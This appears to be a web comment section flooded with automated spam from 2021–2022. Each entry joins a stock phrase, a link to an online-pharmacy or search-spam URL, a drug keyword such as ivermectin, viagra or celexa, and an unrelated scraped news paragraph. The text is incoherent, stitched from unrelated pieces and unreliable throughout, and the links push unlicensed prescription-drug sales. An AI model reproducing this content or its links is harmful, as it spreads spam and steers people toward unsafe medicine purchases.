Will I get paid for overtime? http://9a.stanthonysft.edu.pk/events/eduma-autumn-2016/ stromectol ivermectin “A-Rod’s lawyers would open a Pandora’s box by filing a grievance with MLB relating to the third baseman’s medical treatment,” said Daily News legal analyst Tom Harvey. “MLB and the Yankees now seem to have a legitimate reason to have all records related to Rodriguez’s involvement with Anthony Galea.”

ZYhPiv
11/16/2021 8:29:07 PM

Where are you from? http://www.innovative.co.jp/cgi-local/shop/m_shop.cgi?&keyword=&FF=5&class=all&mode=adm2&pass=in1088 stromectol ivermectin In July, under that new dialogue, the two countries agreedto develop initiatives to cut carbon emissions from heavy dutyvehicles, buildings, manufacturing and coal-fired power, forexample by advancing carbon capture and storage.

yFvj8
11/16/2021 8:29:23 PM

I don't know what I want to do after university http://komae.lomo.jp/koma2/?cmd=edit&page=Help stromectol ivermectin A study on Germany, published in 2007, did find a significantly increased risk. But a 35-year-long survey in Britain by the Committee on the Medical Aspects of Radiation in the Environment, published in 2001, found no evidence that living near nuclear plants increased the incidence of children developing leukaemia.

ny8DZ7
11/17/2021 2:28:53 AM

Can I take your number? http://scl.littlestar.jp/wiki/wiki.cgi?action=EDIT&page=i stromectol ivermectin More wrangling is likely after Islamists were forced to accept a road map less than ideal for them, with a precise timetable for the resignation of their government, said Riccardo Fabiani, an analyst with Eurasia Group.

t000M
11/17/2021 2:29:12 AM

Three years http://jetengine.net/d/log/2001_01090106.html stromectol ivermectin A: I did not want to go to culinary school. I started in kitchens at French-Mexican restaurants in Acapulco. I worked as a line cook, garde manger (a cook who prepares cold food), then as a chef. My bosses sent me to train in San Francisco, Australia and Chicago.

kNcbL9
11/17/2021 2:29:30 AM

It's funny goodluck http://pdmt.com.np/erikshaw/category_item_details_edit.php?id=279 stromectol ivermectin "The defendant failed to appreciate the significance andimplications of the deficiencies and weaknesses which it diddiscover and did not adequately review and where appropriateinterrogate the plaintiffs' (Quinn's) own assessment," McAteersaid in an affidavit.

GtDxzU
11/17/2021 2:29:49 AM

It's a bad line http://kessmedia.co.kr/zeroboard/view.php?id=order&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=104&PHPSESSID=ec3cc195f089ca677e1da73e8ffb5083 stromectol ivermectin "So ladies - who wants to LeanIn to an unpaid internship forMadam Moneybags?" tweeted Christina Trapolino, a marketingdirector in Austin, Texas. "Lean in and bend over," tweetedCharlotte Allen, a conservative writer based in Washington, D.C.

Bm4Ed
11/17/2021 2:30:07 AM

A Second Class stamp http://catslave.cn/index.php/archives/5/ stromectol ivermectin The state's 10-year-old, competitive power market needs toevolve to continue to meet the long-term needs of families andindustry, said William Von Hoene Jr., senior executive vicepresident of Exelon Corp, one of the largest U.S. powercompanies.

WTIR0
4/4/2022 9:05:08 PM

An accountancy practice https://sites.newpaltz.edu/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal%20Pharmacy%20-%20Buy%20Celexa%20Baikal-pharmacy%20Com buy celexa baikal pharmacy With two months to go before the September 22 election, Francois Hollande's government rates Merkel's chances of securing a third term at "85, even 90 percent", a senior aide told Reuters. More strikingly, it is comfortable with that outcome.

4HnYLd
4/4/2022 9:05:39 PM

Whereabouts in are you from? https://directorsblog.nih.gov/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal%20Pharmacy%20-%20Buy%20Celexa%20Baikal-pharmacy buy celexa baikal pharmacy Once the conversation with a potential or current customer becomes more detailed, the interaction should be taken off Facebook, he said. At that point, all information should be stored internally in a customer relationship management system or a tracking tool for customer support.

Kk6DXN
4/4/2022 9:06:10 PM

I stay at home and look after the children https://oan.srpmic-nsn.gov/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal-pharmacy%20Com%20-%20Buy%20Celexa%20Baikal%20Pharmacy buy celexa baikal-pharmacy com Official data showed house prices rose the most in nearlythree years in September, with some cities posting double-digitgains. Entrenched real estate inflation is considered a majorsystemic risk by economists, as it can divert capital from moreproductive uses and simultaneously reduce the ability of Chineseconsumers to spend on other things.

6O0rex
4/4/2022 9:06:35 PM

I can't get a dialling tone https://www.houghton.edu/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal-pharmacy%20-%20Buy%20Celexa%20Baikal%20Pharmacy%20Com buy celexa baikal pharmacy com In the United States, researchers are working on several test tube meat products. In San Francisco, a company is working on test tube pet food. And Gabor Forgacs, a researcher in Missouri, ate a custard-colored piece of 3D-printed pork in 2011 at a TedMed talk.

pWyW4O
4/4/2022 9:07:03 PM

How do you do? https://www.eckerd.edu/?s=Baikal%20Online%20Pharmacy%20%E2%AD%90%20www.Pills2Sale.com%20%E2%AD%90%20Buy%20Celexa%20Baikal%20Pharmacy%20-%20Buy%20Celexa%20Baikal-pharmacy%20Com buy celexa baikal-pharmacy com The agency also recently upgraded its 30-year-old computer system with a new software program designed by Deloitte Consulting. The contract cost the state $62.4 million and aims to process new jobless claims more efficiently.

dfTN9
4/5/2022 4:59:17 AM

How much notice do you have to give? http://victimasconsejobusqueda.congresocdmx.gob.mx/victimas/curriculums/vista/2?page=4523 buy celexa baikal-pharmacy com Under the terms of the Treaty, the US and Russia must meet central limits on strategic arms by February 5, 2018. Each Party has the flexibility to determine for itself the structure of its strategic forces within the aggregate limits of the Treaty.

gkW80
4/5/2022 3:01:56 PM

I'd like to change some money http://cambiotec.org.mx/site/carlos-maynor-salinas-santano-jueves-10-de-diciembre-2020/ buy celexa baikal pharmacy There had never been any hint of the black dog before, although friends commented that, in his startling wit and incisiveness, Tim was an American version of Stephen Fry, who spoke of his own desire to kill himself earlier this year.

qnoB8
4/13/2022 2:35:14 AM

Have you got any ? https://orpheogroup.com/stmap_94gyirtx.html?cialis.cyklokapron.isoniazid.pepcid metronidazole gel for teeth "It's about the ease of incorporation, the ability of Irishcorporate law and tax law to fit in with IRS (Internal RevenueService) requirements, and the flexibility that is shown by theDepartment of Finance and Revenue to any of the multinationals'needs. If they have a problem, the law will be changed."

GlC8eS
4/13/2022 2:35:41 AM

What's the interest rate on this account? https://www.goodworkint.com/stmap_62kqmdaq.html?albuterol.famvir.clomid.levitra collagen hyaluronic acid complex side effects "I've never done any exercise, except hard farmwork," said 86 year-old Wang Kailu, who lives in a simple concrete shack with his wife Wu Aihe. The couple said they married the day after Japan's World War Two surrender, 68 years ago.

jhodic
4/13/2022 2:35:59 AM

Special Delivery http://www.designcure.co.uk/stmap_21wizxfu.html?caverta.cozaar.levitra does nyquil contain aspirin or ibuprofen “I think if I’m arguing for entirely different policies and Congress ends up pursuing policies that I think don’t make sense and we get a bad result, it’s hard to argue that’d be my legacy.”

IvJpa
4/13/2022 2:36:18 AM

I'm sorry, I didn't catch your name https://www.goodworkint.com/stmap_94vqjxxy.html?acivir.tadora.methylcobalamin.viagra can you drink wine when taking macrobid Military judge Colonel Tara Osburn told Hasan he could meet on Tuesday night with a religious conversion expert he had once indicated he may want to call to the stand and give his final decision about witnesses on Wednesday.

shVQJj
4/13/2022 2:36:42 AM

Not in at the moment http://phatfabe.com/stmap_21snbbax.html?mycophenolate.adapalene.cialis para que sirve el paracetamol 500 mg tabletas But Brown vetoed seven other firearms bills introduced in response to the Connecticut school massacre last December. The most controversial sought to ban the manufacture, sale and importation of semiautomatic combat-style rifles with detachable magazines.

HjBnz
4/13/2022 2:56:19 AM

Do you know what extension he's on? https://www.qnez.net/stmap_62vpkwfl.html?vicerex.levitra.pyridostigmine.terbinafine glenpharma share price A new assessment of the ecological status of Finland's waters shows that 85% of the surface area of our lakes and 65% of our rivers are in a good or very good state. However, three-quarters of the surface area of our coastal ...

ISnhKQ
4/13/2022 2:56:34 AM

I don't know what I want to do after university https://4dretailtech.com/stmap_21wizxfu.html?drospirenone.cialis.vrikshamla ivexterm tabletas lactancia The Fed should also return to more qualitative forms of guidance about future rate policy, he said. The U.S. central bank last year said it would keep rates near zero until unemployment falls to at least 6.5 percent as long as inflation stays under control.

PfSpXc
4/13/2022 2:56:47 AM

The manager http://phatfabe.com/stmap_21snbbax.html?silvitra.levitra.mentat ivermectin for dogs border collies "PHS is struggling and it is close to breaching itscovenants so something has to be done with it. It is hanging inthere for now, but the company's next set of results are likelyto be weaker and it is going in the wrong direction," a secondbanker said.

sLL2kj
4/13/2022 2:57:01 AM

Some First Class stamps http://phatfabe.com/stmap_94vqjxxy.html?meclizine.cialis.dydrogesterone permethrin 10 mixing directions for cattle "At the end of the day you can't sit back and judge a man based on a bad year or whatever you want to call it," Coples went on. "He's still a great coach, and we're looking forward to getting better and he's looking forward to preparing us and making sure we getbetter as well."

afkL1
4/13/2022 3:26:36 AM

We'll need to take up references http://www.designcure.co.uk/stmap_62vpkwfl.html?cefaclor.optivar.levitra atarax annostus unilkkeen Having arrived at the crease with the Australian innings in tatters, following a dramatic 32-ball spell in which five wickets fell for nine runs, he proceeded to repair the damage in breathtaking style.

n7Vwr
4/13/2022 3:26:57 AM

We'd like to offer you the job https://4dretailtech.com/stmap_21wizxfu.html?meclizine.omnicef.cialis.isordil metformina dbi ap 850 Over a span of several decades Greene captured images of some of Hollywood's most celebrated stars, including Paul Newman, Ava Gardner, Barbara Streisand, Jane Fonda and Cary Grant. These and others are included in more than 70,000 other unpublished photos of Greene's that are also going up for sale.

zV7wH
4/13/2022 3:27:14 AM

Why did you come to ? https://4dretailtech.com/stmap_62vpkwfl.html?cialis.sleepwell.digoxin ciprofloxacin eye drops ip ciplox eye/ear drops Moringiello said parties tend to object to bankruptcyfilings because they think they can do better under state law,and she said if Rhodes does not grant eligibility the creditors likely will try to get a state court to force the city to payits debts.

QAd6Q
4/13/2022 3:27:33 AM

It's a bad line http://www.designcure.co.uk/stmap_21wizxfu.html?levitra.pepcid.eriacta cefixime research brand in pakistan "You had a president that was working very close with our government in a quiet way. These people come in and so, boom, the curtain comes down," said Heath, now a private security consultant. "It means a disrespect for our government."

fIgDF
4/13/2022 3:27:49 AM

How much is a First Class stamp? https://www.qnez.net/stmap_62vpkwfl.html?cefaclor.viagra.buspar.benicar voltaren retard para q sirve "One of the things that we find, and he finds in his individual engagements with... his Arab colleagues is that they would like to have this update as part of the... Peace Initiative Committee," the senior State Department officer said.

DVnPaf
4/13/2022 6:21:05 AM

How many are there in a book? https://4dretailtech.com/stmap_62vpkwfl.html?royal.viagra.zestril.montelukast famotidine use in gujarati It is the first Tour since Lance Armstrong was stripped of his seven Tour titles (1999-2005) for serial doping. Froome has twice been asked during the race if he is racing clean and answered in the affirmative.

j3SMXl
4/13/2022 6:21:28 AM

Is this a temporary or permanent position? https://45so.org/stmap_21snbbax.html?glibenclamide.valtrex.viagra terbinafine hcl 10 mg Like the ACA, Part D revolves around an online marketplace offering dozens of choices. A study published last year found that seniors who participate are wasting hundreds of dollars by over-insuring themselves: Just 5 percent picked the most cost-effective plan; more than 30 percent overspent by $300 to $500 and nearly 20 percent over-spent by $500 to $1,000, according to researchers at the University of Pittsburgh.

ZcdmUN
4/13/2022 6:21:54 AM

Would you like to leave a message? https://butiaonline.com.br/stmap_62kqmdaq.html?cafergot.betapace.viagra olanzapine uses in telugu "The studies showing high temperature increases violence crime in the US and other wealthy societies seems to suggest physiological responses are important, too, with very short-run exposure to heat contributing to more aggressive and violent behaviour," said Marshall Burke, also of Berkeley.

HbA56n
4/13/2022 6:22:16 AM

Could I make an appointment to see ? https://45so.org/stmap_21snbbax.html?periactin.coumadin.oxytetracycline.cialis voltaren 100 mg tabletten nebenwirkungen The Dow Jones industrial average was down 101.47points, or 0.67 percent, at 15,031.67. The Standard & Poor's 500Index was down 11.76 points, or 0.69 percent, at1,682.11. The Nasdaq Composite Index was down 35.55points, or 0.93 percent, at 3,779.47.

ckvojm
4/13/2022 6:22:35 AM

I'm not sure https://45so.org/stmap_21snbbax.html?zhevitra.viagra.cenforce medroxyprogesterone price in uae "The notion of women being underrepresented in film as well as sports is a universal problem and something that is constantly being talked about but there's not a lot of action towards," says Libby Geist, a producer of the series. Women were certainly being underrepresented on "30 for 30" – the channel's series of sports documentaries. In its 51 films, only four have featured female directors and three female subjects. ESPN announced in February that it would be airing "Nine for IX," a series of nine, hour-long documentaries, focusing on female athletes with films directed by female filmmakers.

fNvNA
4/13/2022 6:39:22 AM

i'm fine good work https://45so.org/stmap_62kqmdaq.html?stavudine.chloramphenicol.zenegra.cialis methotrexate orion 2 5 mg Investigators have said DiMaggio may be headed to Texas or Canada with 16-year-old Hannah Anderson and possibly her 8-year-old brother, Ethan, though investigators said a charred body discovered along with the mother could be the boy.

K3UxG4
4/13/2022 6:39:44 AM

How much notice do you have to give? https://4dretailtech.com/stmap_62vpkwfl.html?breast.peroxide.levitra.phexin breastfeeding mom can take panadol NEW YORK, July 11 (Reuters) - U.S. stocks were poised for astrong open on Thursday, after comments by U.S. Federal ReserveChairman Ben Bernanke indicated the central bank was unlikely toscale back its stimulus measures earlier than expected.

V1rHT5
4/13/2022 6:40:08 AM

I work for myself http://www.designcure.co.uk/stmap_62vpkwfl.html?levitra.timoptic.metoprolol vytorin 10/20 walmart House Republican leaders on Thursday offered a plan toextend the government's borrowing authority for several weeks,and the White House said it would consider the proposal,sparking a big rally on Wall Street.

gcVDcs
4/13/2022 6:40:32 AM

I'm on a course at the moment https://orpheogroup.com/stmap_62vpkwfl.html?cialis.zeagra.fluconazole clotrimazole troche and alcohol In August the company was upbeat about its performance forthe rest of the year after strong sales of its Fagron medicalcompounds unit expanded profit margins by 3.9 percentage pointsto 24.5 percent.($1 = 0.7368 euros) (Reporting By Claire Davenport; editing by Robert-Jan Bartunek)

6Wx2j
4/13/2022 6:40:56 AM

What do you want to do when you've finished? https://butiaonline.com.br/stmap_62kqmdaq.html?ditropan.ampicillin.viagra.minipress differin gel galderma ISON is expected to put on a dazzling show when it zooms through the inner solar system in late November. Researchers used five photos of ISON to stitch together the new photo. These five photos of ISON were taken by NASA's Hubble Space Telescope on April 30.

SWAn0
4/13/2022 7:11:38 AM

Who would I report to? http://phatfabe.com/stmap_94vqjxxy.html?dexamethasone.levitra.zantac.astelin price of albendazole But many are concerned about the chaos that could ensue in the European soccer season, if the World Cup does change from summer to winter. The costs for moving matches and tournaments that are traditionally scheduled during this time are expected to be substantial.

IuMJR
4/13/2022 7:11:57 AM

How much is a Second Class stamp? http://phatfabe.com/stmap_62kqmdaq.html?toprol.metoprolol.cialis crema fijador corega The drugmaker's immunotherapy drug Yervoy failed tosignificantly prolong survival among patients with advancedprostate cancer who had previously received chemotherapy,according to limited data from the first late-stage study of thedrug for the condition. (Compiled by Varun Aggarwal; Editing by Don Sebastian)

zi73B
4/13/2022 7:12:21 AM

I'm retired https://butiaonline.com.br/stmap_94vqjxxy.html?megalis.cialis.ansaid.florinef ivermectin dose for pigeons Even the so-called "blue-chip" clients of PI firms say it can be hard to ensure the information they ask for has been legally gathered. Sometimes PIs use illegal methods to track down the information they need - and then apply legally to obtain it.

4HbkWD
4/13/2022 7:12:41 AM

I've just started at http://phatfabe.com/stmap_62kqmdaq.html?levitra.symmetrel.fildena finasteride canada reddit Treasure Island, Fla., will rename itself “Revis Island, Fla.,” on Thursday as the tiny city celebrates the Tampa Bay Buccaneers’ home opener and their star cornerback, ex-Jets All-Pro Darrelle Revis.

BYdny
4/13/2022 7:13:02 AM

Thanks for calling https://45so.org/stmap_94vqjxxy.html?cialis.timolol.zelnorm vitamin c acne scars reddit After the boiler broke when she was 14 and they couldn’t let a repairman in, the family lived without heat and took weekly showers at a gym. The kitchen was unusable, so they survived on fast food. Two of three bathrooms didn’t work, and the water was turned on in the third only at intervals to flush. Otherwise, the pipes would ooze.

jOMw4
4/13/2022 8:32:36 AM

What university do you go to? https://krplas.com/stmap_21snbbax.html?dydrogesterone.zyrtec.levitra.imitrex amoxicillin 500mg benefits The only drivers worse off are in the 70-plus age group. Their premium costs have dropped by only 3.9 per cent, although I couldn't find anyone to tell me why. The winners are 23- to 29-year-olds, whose cover will cost nearly 13 per cent less, and the 30- to 39-year-olds who see a 10.8 per cent premium fall.

jEPgz
4/13/2022 8:32:56 AM

Free medical insurance https://www.qnez.net/stmap_21wizxfu.html?cordarone.benoquin.levitra sildenafil citrate & dapoxetine tablets da zeagra "I still don't think we performed to the level we want to perform at. If we do that then we'll be good enough. We've certainly got to bat better as a top order. We're going to bowl very well, and we know we can control their batters. It's just a case of making more runs.

uINt0
4/13/2022 8:33:20 AM

I'm from England https://45so.org/stmap_21snbbax.html?primaquine.cialis.naltrexone.bisoprolol methylphenidate medscape You may often find that patients do not do what you perceive to be in their best interest. But all patients are vulnerable, and it's our duty as physicians to provide the best possible care every time, regardless of their demeanor, attitude or choices.

SstvFT
4/13/2022 8:33:44 AM

I'd like to transfer some money to this account https://www.enlightenedtraining.com/stmap_94gyirtx.html?myambutol.betoptic.levitra azithromycin orion 250 mg hinta Moore declined to speculate about whether a foreign bid for BlackBerry could run afoul of national security regulations. Asked if the government wanted BlackBerry to stay Canadian, he replied: "We want them to do well, keep employing Canadians, keeping putting out innovative technologies and platforms, and we're paying close attention."

10EiRd
4/13/2022 8:34:06 AM

How much notice do you have to give? https://www.enlightenedtraining.com/stmap_94gyirtx.html?piracetam.evista.ansaid.levitra preo do naproxeno sdico "We see a lot of good companies which have a profitable business model... but either they are in a smaller niche or do not have the ambition to be global," said Martin Mignot of European venture capital firm Index Ventures.

obP2w
4/13/2022 9:50:03 AM

I've come to collect a parcel https://www.goodworkint.com/stmap_94vqjxxy.html?acivir.tadora.methylcobalamin.viagra monoket fiyat 2020 Seeking to give a boost to homeownership carries risks forthe government. Since the mortgage guarantee component of Helpto Buy was announced in March, house prices have picked up,raising questions about whether it is still needed.

ap4pV
4/13/2022 9:50:33 AM

How much will it cost to send this letter to ? https://4dretailtech.com/stmap_62vpkwfl.html?priligy.levothroid.levitra.oxytetracycline actos 45 mg preisvergleich The consumer group stepped up its calls for far tougher rules on the trade in "personal data", claiming many firms are deliberately making it hard for customers to opt-out of receiving messages.

kpkc34
4/13/2022 9:50:59 AM

Until August https://krplas.com/stmap_62kqmdaq.html?triphala.pilex.levitra.champix fucidin salbe fr was “Sorry,” he said. “My head was all over the place.” Bradley is evidently an intense young man, but his charm is disarming. The 27-year-old is entertaining to watch, what with that manic countenance, the frenzied bounce in his step and that “stink eye” he gives when he is lining up the putt, scowling at the hole with his head half-turned like a cat daring the mouse to make its escape. It is easy to see why so many fans and, indeed, so many of his peers are drawn to him.

TpCGJK
4/13/2022 9:51:24 AM

Yes, I play the guitar https://butiaonline.com.br/stmap_21snbbax.html?viramune.cialis.klaricid.urso fluvoxamine er coupons Yorkshire Post provides news, events and sport features from the Yorkshire area. For the best up to date information relating to Yorkshire and the surrounding areas visit us at Yorkshire Post regularly or bookmark this page.

9FttrL
4/13/2022 9:51:47 AM

This site is crazy :) https://www.enlightenedtraining.com/stmap_94gyirtx.html?levodopa.cialis.eurax livial tibolona engorda In 2009, the exchange allowed Russian aluminium giant UnitedCompany Rusal to list in Hong Kong, even though thecompany failed to meet the city's profitability standards.Regulators allowed the offering to go ahead but restricted theretail portion of the deal, which remains below its IPO price.

nJL5a
4/13/2022 10:13:24 AM

Best Site Good Work https://4dretailtech.com/stmap_21wizxfu.html?drospirenone.cialis.vrikshamla tylenol extended release tablets It is talking about a wider improvement in the capacity of the rail network to transport people and goods that will flow from the increased capacity provided by HS2. It is positing a big improvement in other local, regional and intercity services as a direct result of new opportunities to provide services on existing lines that should be created when much inter-city traffic moves to HS2.

IIPZPV
4/13/2022 10:13:45 AM

We'd like to invite you for an interview https://krplas.com/stmap_62kqmdaq.html?cialis.clavulanate.nexium.dulcolax mometasone furoato spray generico prezzo "If the board was concerned with the hash marks being there, than they had the authority to look at those ballots and retabulate them," Thomas told reporters on a conference call. "They should have done that."

jPWdzE
4/13/2022 10:14:03 AM

Where's the nearest cash machine? https://krplas.com/stmap_62kqmdaq.html?emulgel.viagra.geodon.bupron singulair compendium The security questions that are central to insuring that people are who they say they are - a potential glitch in the marketplaces that critics have warned about for months - were particularly problematic.

nCxBm
4/13/2022 10:14:28 AM

I read a lot https://www.goodworkint.com/stmap_21snbbax.html?misoprostol.zyvox.levitra pulmicort 125 Jones lowered its sales forecast for the fiscal yearslightly to a range of $3.79 billion to $3.89 billion, from$3.80 billion to $3.95 billion. The new range was largely inline with Wall Street expectations.

6H1K6u
4/13/2022 10:14:47 AM

I'm self-employed http://phatfabe.com/stmap_21snbbax.html?ursodiol.yasmin.cialis.eulexin albuterol sulfate aerosol vs powder After it came to light earlier this year that the NSA keeps people on a much shorter digital leash than most suspected, issues such as security and privacy shot to the forefront of online media once again. 

4Usqk2
4/13/2022 10:46:52 AM

Accountant supermarket manager http://phatfabe.com/stmap_62kqmdaq.html?emsam.evista.vasodilan.viagra ibuprofene alternance doliprane There is clear evidence that in some people marijuana use can lead to withdrawal symptoms, including insomnia, anxiety and nausea. Even considering this, it is hard to make a case that it has a high potential for abuse. The physical symptoms of marijuana addiction are nothing like those of the other drugs I've mentioned. I have seen the withdrawal from alcohol, and it can be life threatening.

LOowq4
4/13/2022 10:47:20 AM

I hate shopping https://45so.org/stmap_94vqjxxy.html?micronase.aleve.cialis meditech pharma review The following are trademarks or service marks of Major League Baseball entities and may be used only with permission of Major League Baseball Properties, Inc. or the relevant Major League Baseball entity: Major League, Major League Baseball, MLB, the silhouetted batter logo, World Series, National League, American League, Division Series, League Championship Series, All-Star Game, and the names, nicknames, logos, uniform designs, color combinations, and slogans designating the Major League Baseball clubs and entities, and their respective mascots, events and exhibitions.

2wSqG
4/13/2022 10:47:43 AM

A packet of envelopes https://www.enlightenedtraining.com/stmap_21wizxfu.html?cyclophosphamide.levitra.parafon ciprofloxacin hydrochloride 500 mg side effects While Rouhani's visit to New York boosted hopes of a diplomatic breakthrough in talks to resolve the 10-year-old dispute over Iran's nuclear program, Israeli Prime Minister Benjamin Netanyahu dismissed it on Tuesday as a ruse concocted by a "wolf in sheep's clothing".

gOrawf
4/13/2022 10:48:14 AM

Insufficient funds https://orpheogroup.com/stmap_94gyirtx.html?pentasa.levitra.royal temovate precio The film has created a lot of anticipation because of it cast and because it is acclaimed author Cormac McCarthy's first screenplay. However the studio has kept the film hidden from critics. The film premiered a few weeks ago but Fox embargoed the reviews.

1UAEvR
4/13/2022 10:48:43 AM

Punk not dead https://orpheogroup.com/stmap_94gyirtx.html?ticlid.cialis.himplasia what is the best time to take meloxicam 15mg Soros and Bolton, 42, plan to exchange vows in a smallceremony on Saturday morning at the Bedford, New York estate,which Soros bought in 2003 from "Jurassic Park" author MichaelCrichton. Kimba Wood, a federal judge, will perform thenon-denominational ceremony, which will be attended by membersof the couple's families, including his five children, a sourcefamiliar with the arrangements told Reuters.

Tq6AN
4/13/2022 1:10:55 PM

Please call back later https://www.qnez.net/stmap_21wizxfu.html?bentyl.levitra.valparin pure hyaluronic acid liquid He continued: “However, we are pleased to announce that a sale has been completed that sees the majority of the Internacionale business, including 114 of its stores, its head office and its finance operation, being sold to Internacionale UK Limited. The business will continue to trade without interruption, all of the 1,550 jobs have been transferred to the new owner and the future of Internacionale on the UK and Ireland high street has been safeguarded.

C0cufD
4/13/2022 1:11:18 PM

We need someone with experience https://45so.org/stmap_94vqjxxy.html?saw.vrikshamla.levitra para que sirve el diclofenaco tiamina piridoxina cianocobalamina Some 180,000 people are expected to attend this year's event, which runs until Thursday, and 18 volunteers from the Kildare/Newbridge branch of the organisation will be on hand to offer emotional support to them.

GaSlBT
4/13/2022 1:11:40 PM

Can I use your phone? https://www.goodworkint.com/stmap_21snbbax.html?noroxin.doxazosin.levitra.womenra lisinopril recall fda Indeed, the middle name phenomenon is all about how your child appears to others. There are even parents dealing in acronyms. Take the baby recently named Samuel Alfred Moss, specifically for the moment a teacher asks him to write his initials and he spells out his first name – SAM – to no doubt hilarious effect.

DLB47z
4/13/2022 1:12:00 PM

Lost credit card https://www.enlightenedtraining.com/stmap_62vpkwfl.html?betapace.levitra.warfarin.nitroglycerin kenzoflex ciprofloxacino solucin He is expected to begin work at Barclays this autumn butthere will be a lengthy handover period. He will join the boardat the start of next year and take over as finance director whenLucas retires at the end of February.

3Nesdr
4/13/2022 1:12:22 PM

I've come to collect a parcel https://krplas.com/stmap_21snbbax.html?viagra.buspirone.liv.52 fluticasone propionate inhaler classification “We came here thinking we were just coming on a holiday, and then it’s like been a whirlwind and it’s just turned (everything) upside down," she told NBC's Today programme in her first television interview since the crash.

pK7hCt
4/13/2022 4:54:46 PM

I'd like some euros https://butiaonline.com.br/stmap_62kqmdaq.html?methocarbamol.levitra.captopril clomiphene citrate tablets usp monograph The Bucs have been remarkably undisciplined with 26 penalties in two games. A bone-headed late hit on Lavonte Davis allowed the Jets to kick the winning field goal in Week 1. An illegal formation negated a 73-yard TD last week.

j5qkcF
4/18/2022 3:18:04 AM

http://imrdsoacha.gov.co/silvitra-120mg-qrms

YwZhc
4/19/2022 9:03:09 AM

http://imrdsoacha.gov.co/silvitra-120mg-qrms

ykAzG
4/23/2022 1:05:05 PM

I live here http://www.kodiakmetalworks.com/stmap_37whvkrr.html?cialis.bisoprolol.menosan albuterol 2mg tab The Internet and social media in Kenya, which played a central role in this year's elections by allowing Kenyans to question candidates, took on a new function Tuesday—spreading messages of peace to avert new bloodshed.

fJkHMY
4/23/2022 1:05:32 PM

Until August https://www.radstrategic.com/stmap_37lbquli.html?carafate.anaprox.viagra.lasix extra strength tylenol dosage for adults "The high-margin retail loans are one of the few ways forthe banks to deal with the low interest rates and it looks likeBank Millennium is succeeding with this strategy," said IzaRokicka, analyst at BRE Bank.

ojFYq
4/23/2022 1:05:51 PM

A financial advisor https://proudlyyours.com/stmap_24pkcjjq.html?wellbutrin.claritin.donepezil.levitra ivermectin cats fip They enjoy the unofficial support of the nationalist Attack party, which has 23 seats. However Attack, whose anti-Roma and anti-Turkish policies have raised concerns among some EU officials, said its deputies were away in Brussels for meetings.

VzQBlb
4/23/2022 1:06:10 PM

What sort of music do you listen to? http://adamdesautels.com/stmap_24pkcjjq.html?tenormin.oxsoralen.cialis where can i buy phenylpiracetam Paul Burstow, chairman of the Parliamentary Liberal Democrats and a former health minister, said it would be “crucial" for Parliament to "debate and vote" any British involvement in military action.

rdESf
4/23/2022 1:06:34 PM

I can't get a dialling tone https://www.system32solutions.com.mx/stmap_24pkcjjq.html?neurontin.shatavari.terazosin.viagra minoxidil kirkland brasilia "Chariot's share price in (the first half of 2013) wasweighed down by disappointing results from HRT ParticipaçõesSA's drilling campaign offshore Namibia ... however,management has today embarked on its own initiative to createvalue and generate new interest in the stock."

E9CI5L
4/23/2022 3:27:36 PM

I'm on business https://evilpigeon.dk/stmap_24pkcjjq.html?viagra.requip.lynoral lexapro 5 mg reddit SNC also remains occupied by ongoing investigations intopast corporate misconduct. The far-reaching scandal involvedformer top executives who have since been charged with briberyand corruption for activities in several countries includingLibya, Canada and Bangladesh.

nRc78i
4/23/2022 3:28:08 PM

I've got a full-time job http://adamdesautels.com/stmap_37iydmeb.html?cilostazol.beconase.cialis.flavoxate bactrim banned in the uk The chaos began late last week when tropical storms Ingridand Manuel converged from the Atlantic and the Pacific,drenching Mexico in massive rainfall that has hit around twothirds of the country, according to the interior ministry.

xdTW2
4/23/2022 3:53:27 PM

Will I get travelling expenses? https://www.system32solutions.com.mx/stmap_24pkcjjq.html?zagam.cialis.v-gel.efavirenz does olmesartan medoxomil cause depression "There may be research which can identify for us those people who are likely to respond to this treatment, or that develops a newfangled approach to put a wedge in a shoe that might work a little better," Felson, who worked on the new study, told Reuters Health.

7R6hkU
4/23/2022 3:54:00 PM

Why did you come to ? http://adamdesautels.com/stmap_37iydmeb.html?toprol.malegra.levitra claritin vs allegra vs xyzal Trappe, who had crossed the English Channel in a "cluster balloon" in 2010, said he spent two years preparing for the flight and had waited for suitable weather conditions before embarking on the journey.

WHiMvt
4/23/2022 3:54:32 PM

Could you give me some smaller notes? https://pjreporters.com/stmap_24wriwom.html?clofazimine.aygestin.chloromycetin.viagra poux ivermectine oiseaux "It could end up having the opposite effect to what isintended, and scare away companies that want to do business inBrazil," said Ronaldo Lemos, a professor at Rio de Janeiro StateUniversity who has helped draft Internet legislation in Brazil.

7KI30
4/23/2022 3:55:03 PM

I'm in my first year at university http://www.dethstruck.com/stmap_18qnetae.html?viagra.zoloft.trimox.tadacip coversyl cough "Running human assets on drug smuggling is one thing," said Burton, who also is the former deputy chief of the counterterrorism division of the State Department's Diplomatic Security Service. "But running human assets who are killing people is another."

HvcBL
4/23/2022 3:55:31 PM

Have you got any experience? http://www.kodiakmetalworks.com/stmap_24wriwom.html?tri-cyclen.abilify.ketorolac.cialis xenical quem usou Npower said that this rise is owed mainly to unprecedented investment in infrastructure and the cost of improving energy efficiency. The company’s CEO Paul Massara said that the government and energy firms needed to stop shifting the blame for rising energy bills and come together to tackle the problem head on.

uPbbFj
4/23/2022 5:08:23 PM

Is there ? https://proudlyyours.com/stmap_37iydmeb.html?cialis.differin.adalat harga obat methylprednisolone 8mg Deep-fried canary wings, buffalo milk and even an Alka-Seltzer hamburger are among some of the most ridiculous ways people have tried to overcome the aches and pains of a hangover. But researchers from New Orleans say they have found scientific evidence to suggest that the city’s treasured “Yak-a-mein soup,” also known as “old sober” is actually the best remedy to scare away the toughest of hangovers.

HxbWAb
4/23/2022 5:08:49 PM

